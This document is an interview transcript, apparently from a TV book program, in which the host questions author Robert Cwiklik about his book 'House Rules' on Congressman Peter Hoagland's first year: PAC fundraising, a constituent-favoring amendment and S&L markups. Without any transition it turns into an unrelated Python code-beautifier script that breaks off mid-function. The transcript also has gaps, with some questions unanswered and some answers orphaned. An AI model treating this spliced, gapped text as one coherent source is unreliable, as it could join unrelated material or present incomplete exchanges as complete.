LAMB: And when you were there around him, was it every day? CWIKLIK: No. It was, as I say, for certain periods, if something was coming up, if something was coming to the floor or there were hearings on something, I would hang around intensely for three or four days. And then if things died down, I might back off and not show up for a few days. LAMB: There are a lot of things in the book that we could talk about, but a couple of the people from Nebraska I want to ask you about, because there are incidents in his congressional life that you write about. A fellow by the name of Larry King. Who was he? And what role did he play? CWIKLIK: Well, Larry King was -- he ran a credit union back in Omaha, which gained some notoriety when it was discovered that he was basically running it into the ground. It was thought that he was this sort of model of a black entrepreneur. He was sort of wined and dined by the Republicans as the kind of figure that would lead blacks back into the party because he was such a successful entrepreneur, picking himself up by his bootstraps sort of thing. But then it was found out that he had basically robbed -- I think it was something like $30 million from this credit union; and wild fits of, you know, cocaine using and, you know, all manner of things that are not looked upon favorably in Omaha. And it was viewed then as kind of a minor S&L debacle. I mean, it was sort of a little sideshow. It reflected a lot of the things that were going on in the the S&Ls around the country. LAMB: And how did Mr. Hoagland relate to that? CWIKLIK: Well, when he got on the Banking Committee, it enabled him to kind of take a more public posture on this Franklin affair, which was getting a lot of attention back in Omaha. I mean, it was just non-stop front-page news and 6:00 news. So if -- the Banking Committee's jurisdiction included credit unions, so to be on that committee meant that he would be suddenly a voice in this entire affair. 
LAMB: How did he get on the Banking Committee in the first place? CWIKLIK: Well, as I understand it -- I wasn't around then. But as I understand it, he and his chief of staff, first of all, visited with John Mack, who at the time was the chief of staff to the speaker -- who at the time was Jim Wright. These things have all changed. I don't really know what you say and how you go about, you know, convincing somebody that you should be the one to get the support in the end. But Dan Glickman, who is from the neighboring state of Kansas, went in there and basically made the case that Nebraska was a banking center and that it deserved a voice. But what really put him over the top was when the vote was tied. It looked like Jim Wright voted to put him over the top, so I don't know. That was all kind of murky and vague, and I'm not sure how he got on there. But that -- something in there may have had something to do with it. LAMB: Did he do anything when he first came to Congress in 1989 to begin the process of getting to know people in the party -- anything special? CWIKLIK: Well, as far as I remember after he'd go to the floor for a vote, he'd actually go back to his office and read up on members that he'd seen or shook -- shaken hands with in these almanacs, you know, that are everywhere, "Politics in America" or there's another one; I forget the name of it. He'd go up and he'd look at the person's picture and read the little biographical section and try to memorize their name. And it was, you know, that's sort of a job coming into a place with 435 people. LAMB: Did he take you on the floor with him? CWIKLIK: No, I couldn't do that. I didn't have -- I wasn't a staff member, so I didn't have any -- even, you know, most staff members aren't allowed on the floor; you need a special sort of status. LAMB: Did you sit up in the gallery and look down when he was on the floor? CWIKLIK: Yeah, I would stand in the press gallery. LAMB: Did you go back to the district with him? 
And did you travel with him when he would go back there? CWIKLIK: I went back to the district twice. And I guess I traveled -- I went back with him when he was conducting Town Hall meetings and went to quite a few of those. LAMB: What was his staff like? How big was his staff? What was the allowance allowed for his office to pay for the staff? LAMB: Did you get some sense of why he went into politics in the first place? CWIKLIK: Well, I took him at his word. You know, he said that he believed that politics -- for him, politics was like going into the priesthood was for others. He believed that it was a way to give something back. And I see no reason to doubt that. LAMB: Talk about -- the last chapter is about the pink house. Talk about the difference between living in Omaha and Washington. What's the difference in the price of homes? CWIKLIK: Well, for what they spend here in Washington, I guess $400,000, they tell me that you can buy a mansion in Nebraska for that. I didn't price homes in Nebraska, but it sounds reasonable to me. LAMB: But he was living in a hundred-thousand-dollar home before he moved here. CWIKLIK: Yeah. It was quite a nice neighborhood -- you know, nice little red brick house, and much bigger than the one they ended up with here. LAMB: And did they buy a particular -- I mean, you say the daughter wanted a pink house, and they ended up living in a pink house? CWIKLIK: Yeah, that was very strange. When it became obvious that they were going to buy a house in Washington, his daughter Katy -- out of nowhere, I guess -- just said, "Look, Daddy, I really love the color pink. I want a pink house." And, you know, he very gently told her, "Well, you know, that would be very nice, but you don't find many pink houses, you know. They're not very common." 
And the only house that -- they wanted to live in this one particular neighborhood in Chevy Chase so that they could send the kids to the Somerset Elementary School, which is a real hotshot elementary school. So the only house that they could even consider -- you know, get near to affording was this, you know, stucco and brick monster, which was painted pink. And it still is pink, as I understand. I may be wrong. LAMB: Now did you say that he lived worse here in Washington for $400,000 for his house than he did in Nebraska for $100,000? CWIKLIK: It sure looked like it. I mean, this was a sort of a three-bedroom. It didn't look like there were -- and it was just a lot smaller and a lot more cramped. And the layout was kind of funny. LAMB: Did he let you in his home here? CWIKLIK: Yeah, I went up there once. LAMB: And what about his family? Where did he meet his wife? How long have they been married? CWIKLIK: He met his wife in the Washington office of the public defender. I believe that she was a secretary there at the time. She eventually went to law school, too. CWIKLIK: Yeah. I think they now have five kids. And he has had one since he came to Washington. LAMB: And what did he do before he got into politics in Nebraska? CWIKLIK: Well, there wasn't that much time to do anything, because he left out of high school, he went away to school. And when he got back, I think he fairly quickly got into politics. This was after Yale and after working in Washington as a public defender. He went home and began working immediately for campaigns, and he organized a ballot initiative to get Sunshine Laws passed in the Legislature, which was very successful. So he pretty much leaped right in. LAMB: He was elected to the unicameral Legislature -- the only state in the union that has that? CWIKLIK: Right, in 1978. And the entire unicameral Legislature in Nebraska, I think, has 49 members. And the House Banking Committee has 51 members. So that's quite a culture shock there. 
LAMB: You say he spent his own money to run for the House of Representatives. CWIKLIK: Yeah. Well, he loaned his campaign something like $250,000. It may have been more. And I thought it was kind of curious that, under the rules that currently govern the system, he can now -- or he did, after he was in office -- he could go to PACs and raise money from them to retire the debt to himself. So basically, the money was coming straight to him. And it was entirely legal. You know, I don't mean to suggest there was anything illegal about it. It just seemed kind of funny to me. LAMB: You wrote that he couldn't raise money from his office in the Capitol, or in the Rayburn Building, or wherever -- where was his office located? CWIKLIK: He was in Longworth. LAMB: Longworth, looking back over the power plants. LAMB: But he had to go to the Democratic Congressional Campaign Committee in a booth? CWIKLIK: Yeah, they have -- it's a very convenient -- I've heard it described as an `ethics-free zone' over there. It's a couple of blocks down from Longworth. And you can go in there -- it's a good place to rush over to. It's easy to, like, run over there in between votes or in between meetings and put in 10 or 20 calls. LAMB: Who does he call? LAMB: And did he take you with him to show you how it's done? CWIKLIK: Yes. I went with him. I did that once. And he didn't seem very eager for me to be there. It's just one of those things that they're none too comfortable about, I get the sense. CWIKLIK: I did ask him about that. I didn't ask him about it specifically in relation to his campaign loan. Frankly, it just didn't occur to me. I was so -- I was pretty boggled by this whole system. And that connection didn't occur to me until much later. 
But I did ask him why he called banking PACs and not others, and he said that he didn't call PACs that didn't have an interest in the legislation before his committee, which seemed to me to be saying, "We only offer our merchandise to those who want to buy it." And it sounded sort of fishy. CWIKLIK: No, not at all. LAMB: ... from what the others do? CWIKLIK: No, no. Certainly not. LAMB: And everything he did was legal? CWIKLIK: I think it's obvious from the way they shy away from doing this out in the open. LAMB: This is what the book looks like. It's called "House Rules," written by Robert Cwiklik. And we're talking about Congressman Peter Hoagland, a Democrat from Omaha, Nebraska, in his second term. But you followed him around for the better part of a year of his first term. CWIKLIK: I'm from Pennsylvania originally, and I grew up in upstate New York. CWIKLIK: I studied political science. CWIKLIK: That's a very good question -- I think it was in 1978. LAMB: What did you do after that? CWIKLIK: After that, I was briefly a teacher, and then I became a free-lance writer. And here I am. LAMB: In this book, you refer often -- and I wrote it down -- on page 93 to a "festival of flattery." And as you describe what that is, I'll see if I can find a quote from you. CWIKLIK: I think I remember one -- I mean, you've seen enough hearings on the Hill to know that it's just common coin here for members of Congress to inject a lot of foam into their remarks. The "most fastidious, most competent, most diligent, most hardworking gentleman from Louisiana." LAMB: Let me read from page 154. And this is, on June the 15th, Congressman Hoagland, quoting, "'I appreciate our illustrious chairman of the full Banking Committee yielding,' that's Henry Gonzalez, 'yielding time to me and appreciate his gracious handling of those complex issues in committee and now on the floor,'" unquote. "Hoagland enthused, and he was warming up." 
You go on to quote him, "It is a great pleasure to serve with the gentleman from Texas. He has done the nation and our Congress proud with his handling of this bill." LAMB: You refer to that often. Was that irritating? LAMB: Why is it amusing? CWIKLIK: ... I don't know. Why amusing? Well, ironic, I guess, would be another way to put it. A couple of weeks later, after Mr. Hoagland sort of basted his committee chairman in that fashion, he basically turned on him on the floor and voted against his position on the bill in a very public way. So it just seems to be a lot of frosting. LAMB: Is it hard for a freshman member to vote against his chairman? LAMB: There is a -- and you correct me if I'm wrong -- there is a gentleman from Nebraska by the name of Janne? LAMB: Mike Janne from Omaha, Nebraska? CWIKLIK: Well, I guess you'd call him a financier. He owns a thing called America First Corporation, which puts together packages of investments for people to join in on. And he acts as the sort of general partner that manages the investments. And he put together groups to buy a couple of savings and loans. And at one point, the bailout bill made it -- it was sort of a complicated provision, but basically it made one group of investors liable for the losses of another group of investors, though they had virtually no common links other than the fact that Janne sat at the same table with both of them. And the one amendment that Congressman Hoagland was able to get in, with the help of his committee chairman, was benefiting Mike Janne back in Omaha. LAMB: If we can, let's try to go through that in detail. Was Mike Janne a Democrat? CWIKLIK: No, he was a Republican. And, in fact, Congressman Hoagland went to him for support before the election and got nowhere. But then once he got into office, as so often happens, Mike Janne decided -- or through his PAC -- I guess he controlled a PAC back there -- to donate $5,000 to the newly elected congressman. So things changed. 
And you send your money with the winner. CWIKLIK: He was the controlling partner in two different groups, or consortia, of investors. And that link alone was enough, according to the original draft of the bailout bill, to make each consortia responsible should the other lose money. LAMB: Who came to Congressman Hoagland first to try to rectify the situation? CWIKLIK: Well, I believe it was -- I'm not sure on this -- but I believe it was a former congressman from Omaha, John Cavanaugh, who was working for -- or he was associated with a law firm that Mike Janne did a lot of business with. LAMB: John Cavanaugh, the same congressman, a Democrat, who had quit Congress for what reason? CWIKLIK: Well, he said he wanted to spend a lot more time with his family. He quit at a fairly young age. I can't remember. I think he was -- he looked young. I don't know how old he was -- maybe 40 or something. LAMB: So he brought the idea of a special amendment to Mr. Hoagland. LAMB: What did he do with it then? CWIKLIK: Well, unlike a lot of offices, where the amendment might have gone through the staff and bubbled up to the congressman and gotten pretty thoroughly discussed along the way, Congressman Hoagland basically looked it over and said, "Yeah, fine. That's good public policy." And he admitted that he also saw it as a way to build a bridge to the business community back in Omaha. He didn't have much support from them, and Mike Janne could deliver that kind of support. So it looked good on the merits and it looked good politically. So he decided to go with it. And he didn't bother consulting anybody on his staff. And when they found out about it, a couple of them were pretty outraged because this was clearly a case where, if you wanted to get nasty, you could easily say that here he is, becoming a slave to special interests. And taking campaign money and introducing amendments -- what has he come to, this freshman congressman? 
And that's exactly what happened when The Wall Street Journal printed an editorial just bashing him. It landed on him with both feet and said that he had -- I think the title of it was Congressional Crack. And basically accused Congressman Hoagland and several other people of not being able to resist the addiction to special interest money and special favors for those who deliver it. LAMB: How can an editorial in The Wall Street Journal hurt somebody in Omaha, Nebraska? CWIKLIK: I don't know if it did, but it certainly scared them. I mean, the day after it appeared, I was in his office and he told me that he couldn't sleep all night. He said he was tossing and turning and just thinking about it all night, that it really got to him. I think the fear is that, you know, in the next election, somebody's going to take that out and take a picture of it and put it in a video machine make a 30-second spot out of it, saying, "The Wall Street Journal says Peter Hoagland is addicted to congressional crack," or something like that -- you know, one of these brilliant pieces. And they're very afraid of things like that. LAMB: At some point, had the Omaha World Herald picked up on that editorial and written a local story on it? CWIKLIK: Yeah, they did a piece on it. Basically a "he said thing." But when Congressman Hoagland went to them and explained the merits of the Janne amendment, I think they pretty much dropped the story. LAMB: Did the Janne amendment ever become law? CWIKLIK: Yes. It was in the final version of the S&L bill. LAMB: Was it hard to keep it in the final version? CWIKLIK: Well, that was another thing. I mean, after he got beaten up by The Wall Street Journal on this amendment, it came to the floor when the House acted on the S&L bill for the first time. And this was a season when special interests were sort of the main topic of discussion. 
And Congressman Leach offered a motion to recommit the bill, just before -- it was just on the lip of final or of preliminary passage in the House. And just before that, he offered a motion to recommit, which is a very rare motion. It hardly ever succeeds. And it specified that -- to recommit the bill to the Banking Committee and tear out all the special interest provisions. And it just sort of caught fire in the House that night. And I think it won by -- I mean, that's something you can't vote against. You know, you can't start say -- if you vote against that, you're saying, "Well, yeah, I like special interest legislation." So that lost big time, and Congressman Hoagland ended up voting against his own amendment that night. LAMB: You wrote about Congressman Walter Fauntroy and a prayer that you -- were you there in the room that day? CWIKLIK: No, I wasn't. Oh, wait. Yes, I think I was. I'm sorry. LAMB: And what was it about the prayer that got your attention? CWIKLIK: Well, there were, I think, two or three -- Congressman Fauntroy opened up the session of the S&L markups, which is when they decide what the final language of the legislation's going to be, and that's pretty much where you can -- usually, if you're a special interest, you can lose $10 million if a sentence is changed here or there. So people have their eyes open during that proceedings. And there's a large temptation for slipping favors into the bill that might not be noticed very easily. And Congressman Fauntroy said a prayer to open the proceedings. He said it was the first time he had done so in 20 years on the committee. I can't remember the exact words, but he basically said, "Look, you know, God help us not to give in to our baser impulses here." LAMB: There's a headline that you do print from The Washington Times that came as a result of this prayer that said, "Members say grace before digging in." CWIKLIK: Well, it was very ironic. 
Because right after he said this prayer -- boom, boom, you know, right -- one after another, special interest amendments came cropping up and were being voted on, and passing. And Congressman Fauntroy, I believe, had one of his own, or voted for them in any case. I can't remember. You're better situated to inform us on this point. LAMB: Let me ask you about what your reaction was as you're going through this thing. You had not spent much time covering Congress, you told us earlier. LAMB: Again, what were you thinking as you started seeing this process up close? CWIKLIK: Well, it seemed kind of funny to me, actually. A lot of these things just seemed to go on exactly as you hear about. I mean, it was almost like a caricature of what you see in the news. People, for instance, introducing amendments that they had received in the mail without hardly even reading, you know, just because someone had given them a certain amount of money, or at least presumably so. It didn't seem like there was much creativity involved, in any case. LAMB: Is the system honest? LAMB: Did you like what you saw? CWIKLIK: I think there is a lot of room for improvement. LAMB: Knowing what you know now, would you get into the game at any point? CWIKLIK: How do you mean? As a politician? CWIKLIK: No, I don't think I have the energy for it, for one. I mean, it just takes an incredible amount of stamina to even run for office, let alone serve there. And I think I would be -- if I were ever to do it, I would be the type that would fizzle out quickly. I'd come in and I'd just start shooting my mouth off and probably never -- I'd never get anybody to give me any money to run again. So I think that's how that works. LAMB: There's some odds and ends I want to ask you about. Quote from your book, "Late in the afternoon of the last day of full committee markups, a 5:00 shadowy mood settled over the room. 
While tiresome debates droned on, members eased back in their chairs, some reading papers or swilling beer." In the middle of a committee room, swilling beer? CWIKLIK: Yeah. There was one guy who was sitting back there drinking a beer. It was late. And it was really painful. I didn't blame him at all. LAMB: You also say that mess -- you found, during one of the markups, that you arrived at the door early in the morning and outside the committee room -- I don't know if I can say it correctly, but you -- it looked like a bunch of people at a Bon Jovi concert. I don't know if my quote's right, but explain that. CWIKLIK: Well, I guess, I'm sure you know that for years now, there's been a rule in the House that as often as not, hearings are open to the public, and there's a section reserved for the public. And for a popular -- well, popular might not be the right word -- but for a proceeding where there's a lot of interest, like the S&L markup, lines form early on to get those seats. So approaching the S&L committee room on days when these markups were happening, it was very strange to see these young people -- the teen-agers or very young people in, like, Spandex tights and T-shirts and sunglasses. And it looked for all the world like a Bon Jovi concert, not like Henry Gonzalez and the S&L Banking Committee -- or the House Banking Committee. What would happen then -- if you hung around long enough, you'd see this phalanx of limousines come pulling up and these lobbyists come piling out in their pinstripes and their Gucci shoes. And they would go up and take the place of the bike messengers, which is what these young people were. And they had been -- all been hired for anywhere from $10 to $30 an hour to just sort of hold the places in line, so that the public seats ended up being kind of like scalped for the lobbyists. CWIKLIK: Gary Caruso was Congressman Hoagland's communications director-press secretary. 
LAMB: Quote, "Gary" -- this is you writing this -- "Gary had seen members in Longworth hallways give one another thumbs up signs, gleefully predicting they'd get the money. Later, he saw some of the same members denouncing the raise on the House floor. They're such hypocrites, he said." CWIKLIK: That's what he said. LAMB: He said that to you. LAMB: You wrote that down. LAMB: Why? I mean, what was he talking about? CWIKLIK: Well, he was talking about the first time, in 1989, that the House -- there was a movement in the House trying to give itself a pay raise. And for a while, it looked as if it wouldn't even come to the floor for a vote. I guess -- you may recall that under the procedure that existed at that time, if they didn't vote on it, they would have gotten it automatically. But there was such an outcry from the public, that they were forced to take a vote. And of course, at the time, an overwhelming majority felt that voting for it was not an option. But during that time, Gary tells me that he saw members -- when it still seemed like the pay raise was going to come through, he saw members you know, slapping each other on the back saying, "Yeah, we're going to get it this time." And then he saw those same people going down to the floor, demanding a vote on this pay raise -- this outrageous pay raise, so that they could kill it. And he didn't quite admire that attitude. I didn't happen to be there, so I'm just reporting what he told me. LAMB: Your words again. "Throughout the day, tubes all over Capitol Hill -- Hill glow with C-SPAN's coverage of the House and Senate floor proceedings." LAMB: Let me continue -- "But members with schedules anything near as packed as Hoagland's seldom have time to sit back and watch. Their staffs have even less free time. So sets are left to drone in the background like video Muzak pumping legislative atmosphere to every corner of Congress." CWIKLIK: I didn't mean to suggest that nobody's watching. 
However, I think the way it works is, it's going on in the background, and then you perk up when something interesting bubbles up on the floor or in a hearing. But it's basically on non-stop, as far as I could see. LAMB: Do they have -- we really haven't gone through this, but what's a day like for Peter Hoagland? Did you follow him often from start to finish? CWIKLIK: Enough, but it often would start with an early morning issues group. He would meet with a health-care issues group, and they would talk about, I guess, legislation that was coming down the pike in the long term. And they would sort of invite guest speakers in from the administration or wherever, and talk about where things might be headed. He liked to do things like that. And then there might be a meeting of the Democratic caucus, which would -- that was kind of a highlight of the day because that got to be pretty raucous, though I couldn't get him to report verbatim very often on that. And when the House was in session -- generally, after the caucus, if the House was in session, he would have his series of appointments to attend to. He had a pretty full calendar of either lobbyists or constituents or officials from one place or another coming in to talk to him. LAMB: You mentioned that he is a very straitlaced type of individual. You also mentioned a couple of times that he drank soda water or whatever at some of these receptions. CWIKLIK: At a fund-raiser, I think that his drink of choice was club soda. LAMB: Do you get any sense of how much alcohol is consumed on Capitol Hill? CWIKLIK: Probably because I was traveling with Congressman Hoagland, it didn't seem to me like a hell of a lot was consumed. But that could be very wrong. I don't know. LAMB: You start off your book and you talk about Thomas Jefferson and Alexander Hamilton for a reason, and I'd like to have you set up that scene. CWIKLIK: Well, OK. 
Well, it seemed to me relevant, especially since there's been so much criticism of Washington and Congress of late, along the lines of, "Well, you know, nothing ever gets done in Washington, and Congress never seems to be able to do anything." And it seems clear, from looking at the history of the adoption of the Constitution, that that's exactly how the framers intended for the government to function -- or they basically wanted it to run like a jalopy. They didn't want the hot political winds to drive it in an efficient and fast-moving way. They thought that it would be healthier that it didn't move too quickly. And as a result, you have a president and a Senate and a House all elected on basically different agendas, all colliding with one another, and all these different points at which special interests can apply their pressure to block things or to get things that they want. But it's very hard for the majority -- all the people out there to come together in one place for one program. LAMB: Who's your favorite, Thomas Jefferson or Alexander Hamilton? CWIKLIK: Well, you know, you could certainly see, I think, the blend of the two was probably good for us back then because in a -- you know, the nation didn't have any money, we didn't have any army. To be going around with this sort of absolute democracy probably would have lasted about five years. But I think now there is enough -- you know, there's just enough communications media to get the message out to people. There's enough basis for building a fairly strong consensus on a lot of issues, that it might not be so dangerous to have more of a parliamentary system, to where a majority faction was encouraged to come together. And right now, it's very hard to form a majority point of view in this country, because there are so many different outlets. LAMB: You write on page 158, "One way politicians control the news agenda is when both parties stop talking about something. 
Then the press often won't talk about it either. Despite its vaunted aggressiveness, the press sometimes seems to have a yellow streak. It doesn't like to get out front on issues; it likes to follow the leader." CWIKLIK: Yes. Well, that was -- I think that was particularly true in the S&L matter in 1988. It was, I think, pretty widely known among politicians in Washington that there was something really rotten in the S&Ls, and that something just had to be done about it. But you really didn't hear very much, even though that was an election year. There was a presidential race that year and there was congressional campaigns. You hardly heard a peep about this S&L issue, even though it was a massive problem, and it was bound to cost hundreds of billions of dollars. And there was a reason for that. And Congressman Leach explained it to me. He said that basically the Democrats were just as guilty as the Republicans. Well, I think he thought the Democrats were more guilty, but we can leave that aside -- and that both parties basically decided to keep quiet about it. Now when that happens, reporters don't get their sources to come out in the open, and they basically would have to take it upon themselves to break it. And that doesn't happen as often as you'd like. A lot of the real big stories that you get are the result of leaks and officials coming out with something. LAMB: Do you intend to do any more on this subject? LAMB: You're finished with Congress? CWIKLIK: Well, I just finished writing a book for adolescents about Tecumseh, the famous Shawnee warrior, who led a revolution -- a failed revolution. I guess all the folks out in the Midwest know him well. LAMB: If you had this book to do over again, would you do it again? CWIKLIK: I think so. It was a learning experience. LAMB: What would you say you learned overall, besides what we've talked about? CWIKLIK: I think I learned just how boxed in members of Congress feel themselves to be. 
I think they feel that there's so much attention paid to the presidency and to sound bites. Congress doesn't mix with sound bites. They've got a need -- they need time to get out and let their sort of their imagination wander and get arguments out there that are fairly complicated. And it just doesn't happen. So they're often laboring in the shadows. And there's not much encouragement to come out in the open with a constructive program. LAMB: Do you think that an opponent -- and by the way, do you know whether Mr. Hoagland has an opponent? CWIKLIK: Not this year. I don't know. LAMB: But do you think an opponent would want this book as fodder against him? LAMB: Do you think his office is worried about that? CWIKLIK: Oh, have no doubt. But, you know, that's not to be avoided. That's going to happen. It's politics. LAMB: Do you think if they had a chance to do this again, would they let you in the door? CWIKLIK: No, I don't think so. CWIKLIK: Well, I think he feels now that it was a mistake. It didn't come out the way he wanted it to. But I guess you'd have to ask him. LAMB: Based on your experience of seeing Congressman Peter Hoagland up close, if you lived in Omaha and had the chance to vote for him, would you vote for him? CWIKLIK: I don't know if I'm ready to, you know, make an endorsement one way or another. I don't live in Omaha, so fortunately, I don't have to worry about making that decision. LAMB: Did you see anything that would bother you, besides what you've written here? I mean, is it all in the book? CWIKLIK: I think so, yeah. I think everything that's relevant is in there. LAMB: Our guest has been Robert Cwiklik. This is what the book looks like. It's called "House Rules." It's about a freshman congressman, Congressman Peter Hoagland, a Democrat, out of Omaha, Nebraska. And this book was written about his first year in 1989. Mr. Cwiklik, thank you for joining us. CWIKLIK: It's been a pleasure, Brian. Thank you.
"""Source beautifier for .js, .kl and .html files.

Tokenizes the input with a simple longest-prefix splitter, normalizes
whitespace/comment/string/number/regex tokens, then re-emits the code with
a two-space indent unit.  Files are rewritten in place.
"""

import sys
import os
try:
    # 'exceptions' exists only on Python 2 and is unused at runtime; guard
    # the import so the tool also runs on Python 3.
    import exceptions
except ImportError:
    exceptions = None
import glob

# File extensions accepted on the command line.
fileTypes = ['.js', '.kl', '.html']

# Word lists used to classify tokens.
controls = ['case', 'default', 'do', 'else', 'for', 'if', 'while', 'throw', 'switch', 'catch']
keywords = ['break', 'continue', 'finally', 'return', 'try', 'var', 'with', 'delete', 'new',
            'typeof', 'instanceof', '#include']
functions = ['function', 'operator']
curly = ['{', '}']
brace = ['(', ')']
bracket = ['[', ']']
allbrackets = []
allbrackets.extend(curly)
allbrackets.extend(brace)
allbrackets.extend(bracket)
quotes = ['"', "'"]
whitespace = [' ', '\n']
comment = ['//', '/*', '*/']
semicolon = [';']
comma = [',', '.']
unaoperators = ['++', '--', '>>', '<<']
# Longest operators first so e.g. '===' wins over '=='.
binoperators = ['===', '!==', '<<=', '>>=', '+=', '-=', '/=', '*=', '%=', '||', '&&',
                '>=', '<=', '==', '!=', '^=', '&=', '|=', '+', '-', '/', '*', '%',
                '>', '<', ':', '?', '&', '^', '=', '!']
operators = []
operators.extend(unaoperators)
operators.extend(binoperators)
# Every string that terminates a word during splitting.
splitters = []
splitters.extend(comment)
splitters.extend(comma)
splitters.extend(semicolon)
splitters.extend(allbrackets)
splitters.extend(quotes)
splitters.extend(whitespace)
splitters.extend(operators)

# Token type bit flags.
TYPE_CONTROL = 0
TYPE_KEYWORD = 1
TYPE_FUNCTION = 2
TYPE_CURLY = 4
TYPE_BRACE = 8
TYPE_BRACKET = 16
TYPE_ALL_BRACKETS = TYPE_CURLY | TYPE_BRACE | TYPE_BRACKET
TYPE_QUOTE = 32
TYPE_WHITESPACE = 64
TYPE_COMMENT = 128
TYPE_NO_CODE = TYPE_WHITESPACE | TYPE_COMMENT
TYPE_SEMICOLON = 256
TYPE_COMMA = 512
TYPE_BINOPERATOR = 1024
TYPE_UNAOPERATOR = 2048
TYPE_OPERATOR = TYPE_BINOPERATOR | TYPE_UNAOPERATOR
TYPE_IDENTIFIER = 4096


class token():
    """A single lexical token: its text, a TYPE_* flag, and the index of the
    matched word inside its word list (e.g. curly index 0 == '{', 1 == '}')."""

    string = ''
    type = ''
    index = -1

    def __init__(self, string, type=TYPE_IDENTIFIER, index=0):
        self.string = string
        self.type = type
        self.index = index

    def isTypeOf(self, type):
        # BUGFIX: used to `return self.type`, which is not a comparison at
        # all (and is falsy for TYPE_CONTROL == 0).  Accept either an exact
        # match or a bitmask match (e.g. TYPE_ALL_BRACKETS).
        return self.type == type or (self.type & type) != 0


def tokenize(content):
    """Split *content* into a list of token objects.

    After raw splitting, several normalization passes merge comments,
    strings, numeric literals and regex literals into single tokens,
    collapse whitespace, and move '{' in front of preceding newlines.
    """
    # first some basic formatting; the indent unit everywhere is two spaces
    content = content.replace('\t', '  ')

    # get all of the words: repeatedly find the earliest splitter match
    words = []
    while len(content) > 0:
        minSplitIndex = len(content)
        minSplitter = ''
        for i in range(len(splitters)):
            split = content.partition(splitters[i])
            if len(split[1]) > 0:
                if len(split[0]) < minSplitIndex:
                    minSplitIndex = len(split[0])
                    minSplitter = splitters[i]
        if minSplitIndex == len(content):
            words.append(content)
            content = ''
        else:
            split = content.partition(minSplitter)
            if len(split[0]) > 0:
                words.append(split[0])
            words.append(split[1])
            content = split[2]

    # parse the words to tokens: first word-list match wins, else identifier
    tokens = []
    for word in words:
        tokenIdentified = False
        if not tokenIdentified:
            for i in range(len(controls)):
                if(word == controls[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_CONTROL, i))
                    break
        if not tokenIdentified:
            for i in range(len(keywords)):
                if(word == keywords[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_KEYWORD, i))
                    break
        if not tokenIdentified:
            for i in range(len(functions)):
                if(word == functions[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_FUNCTION, i))
                    break
        if not tokenIdentified:
            for i in range(len(curly)):
                if(word == curly[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_CURLY, i))
                    break
        if not tokenIdentified:
            for i in range(len(brace)):
                if(word == brace[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_BRACE, i))
                    break
        if not tokenIdentified:
            for i in range(len(bracket)):
                if(word == bracket[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_BRACKET, i))
                    break
        if not tokenIdentified:
            for i in range(len(quotes)):
                if(word == quotes[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_QUOTE, i))
                    break
        if not tokenIdentified:
            for i in range(len(whitespace)):
                if(word == whitespace[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_WHITESPACE, i))
                    break
        if not tokenIdentified:
            for i in range(len(comment)):
                if(word == comment[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_COMMENT, i))
                    break
        if not tokenIdentified:
            for i in range(len(semicolon)):
                if(word == semicolon[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_SEMICOLON, i))
                    break
        if not tokenIdentified:
            for i in range(len(comma)):
                if(word == comma[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_COMMA, i))
                    break
        if not tokenIdentified:
            for i in range(len(binoperators)):
                if(word == binoperators[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_BINOPERATOR, i))
                    break
        if not tokenIdentified:
            for i in range(len(unaoperators)):
                if(word == unaoperators[i]):
                    tokenIdentified = True
                    tokens.append(token(word, TYPE_UNAOPERATOR, i))
                    break
        if not tokenIdentified:
            tokenIdentified = True
            tokens.append(token(word, TYPE_IDENTIFIER, 0))

    # now since we know the tokens, let's simply some of them
    # simplify the comment tokens into single tokens
    # ('//' runs to the next newline, '/*' runs to the matching '*/')
    newTokens = []
    lastToken = False
    for i in range(len(tokens)):
        if(lastToken):
            if(lastToken.index == 0):
                if(tokens[i].type == TYPE_WHITESPACE and tokens[i].index == 1):
                    newTokens.append(lastToken)
                    newTokens.append(tokens[i])
                    lastToken = False
                else:
                    lastToken.string += tokens[i].string
            elif(lastToken.index == 1):
                lastToken.string += tokens[i].string
                if(tokens[i].type == TYPE_COMMENT and tokens[i].index == 2):
                    newTokens.append(lastToken)
                    lastToken = False
        elif(tokens[i].type == TYPE_COMMENT):
            lastToken = tokens[i]
        else:
            newTokens.append(tokens[i])
    if(lastToken):
        newTokens.append(lastToken)
    tokens = newTokens

    # simplify the string tokens into single tokens
    newTokens = []
    lastToken = False
    for i in range(len(tokens)):
        if(lastToken):
            if(tokens[i].type == TYPE_QUOTE):
                if(tokens[i].index == lastToken.index):
                    lastToken.string += "'"
                    newTokens.append(lastToken)
                    lastToken = False
                else:
                    # the other quote character inside the string is literal
                    lastToken.string += '"'
            else:
                lastToken.string += tokens[i].string
        elif(tokens[i].type == TYPE_QUOTE):
            lastToken = tokens[i]
            lastToken.string = "'"  # prefer singles
        else:
            newTokens.append(tokens[i])
    if(lastToken):
        newTokens.append(lastToken)
    tokens = newTokens

    # simplify the numeric tokens into single tokens
    # (merges digit runs, exponent 'e' parts and unary minus exponents)
    newTokens = []
    lastToken = False
    for i in range(len(tokens) - 1):
        if(lastToken):
            if(tokens[i].type == TYPE_IDENTIFIER):
                if(tokens[i].string == 'e' and lastToken.string.find('e') == -1):
                    lastToken.string += tokens[i].string
                else:
                    try:
                        intvalue = int(tokens[i].string[0:1])
                        lastToken.string += tokens[i].string
                    except Exception:
                        newTokens.append(lastToken)
                        newTokens.append(tokens[i])
                        lastToken = False
            elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 1 and
                 lastToken.string.endswith('e')):
                lastToken.string += tokens[i].string
            elif(tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '-' and
                 tokens[i + 1].type == TYPE_IDENTIFIER):
                try:
                    intvalue = int(tokens[i + 1].string[0:1])
                    lastToken.string += tokens[i].string
                except Exception:
                    newTokens.append(lastToken)
                    newTokens.append(tokens[i])
                    lastToken = False
            else:
                newTokens.append(lastToken)
                newTokens.append(tokens[i])
                lastToken = False
        elif(tokens[i].type == TYPE_IDENTIFIER):
            try:
